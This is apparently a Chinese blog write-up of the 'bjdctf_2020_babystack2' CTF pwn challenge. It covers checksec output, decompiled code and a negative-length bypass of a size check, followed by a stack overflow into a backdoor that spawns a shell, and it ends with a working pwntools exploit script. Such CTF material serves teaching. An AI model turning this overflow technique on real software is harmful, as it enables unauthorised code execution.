加载头像

bjdctf_2020_babystack2

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babystack2/bjdctf_2020_babystack2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x400000)

IDA

main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[12]; // [rsp+0h] [rbp-10h] BYREF
size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
LODWORD(nbytes) = 0;
puts("**********************************");
puts("* Welcome to the BJDCTF! *");
puts("* And Welcome to the bin world! *");
puts("* Let's try to pwn the world! *");
puts("* Please told me u answer loudly!*");
puts("[+]Are u ready?");
puts("[+]Please input the length of your name:");
__isoc99_scanf("%d", &nbytes);
if ( (int)nbytes > 10 ) //操作
{
puts("Oops,u name is too long!");
exit(-1);
}
puts("[+]What's u name?");
read(0, buf, (unsigned int)nbytes); //buf长度16
return 0;
}

可疑函数backdoor()

1
2
3
4
5
__int64 backdoor()
{
system("/bin/sh");
return 1LL;
}

//0x400726

0x02


思路

1.nbytes>10 就会exit(),设置nbytes负数

2.利用read()溢出至backdoor()

s 0x10
rbp 0x8
ret backdoor()

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
io = process(['./bjdctf_2020_babystack2'])
# io = remote('node4.buuoj.cn', 28972)
elf = ELF('./bjdctf_2020_babystack2')

io.sendline(b'-200')

backdoor = 0x400726
padding = 0x10 + 0x8
payload = b'a' * padding
payload += p64(backdoor)
io.sendline(payload)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體